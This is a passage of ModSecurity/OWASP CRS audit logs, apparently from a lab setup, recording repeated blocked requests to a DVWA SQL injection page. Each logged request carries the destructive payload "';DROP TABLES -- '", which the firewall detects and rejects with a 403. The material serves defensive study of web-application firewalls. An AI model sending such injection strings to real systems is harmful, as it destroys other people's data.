80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2zH8AAQEAAAmHBJsAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2zH8AAQEAAAmHBJsAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2zH8AAQEAAAmHBJsAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2zH8AAQEAAAmHBJsAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":428,"p2":2183,"p3":0,"p4":0,"p5":188,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:43 --0400","transaction_id":"WRc2z38AAQEAAAmHBJwAAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2z38AAQEAAAmHBJwAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2z38AAQEAAAmHBJwAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2z38AAQEAAAmHBJwAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2z38AAQEAAAmHBJwAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":413,"p2":2151,"p3":0,"p4":0,"p5":171,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:45 --0400","transaction_id":"WRc20X8AAQEAAAmHBJ0AAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc20X8AAQEAAAmHBJ0AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc20X8AAQEAAAmHBJ0AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc20X8AAQEAAAmHBJ0AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc20X8AAQEAAAmHBJ0AAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":432,"p2":2376,"p3":0,"p4":0,"p5":206,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:47 --0400","transaction_id":"WRc2038AAQEAAAmHBJ4AAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2038AAQEAAAmHBJ4AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2038AAQEAAAmHBJ4AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2038AAQEAAAmHBJ4AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2038AAQEAAAmHBJ4AAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":539,"p2":2986,"p3":0,"p4":0,"p5":250,"sr":21,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
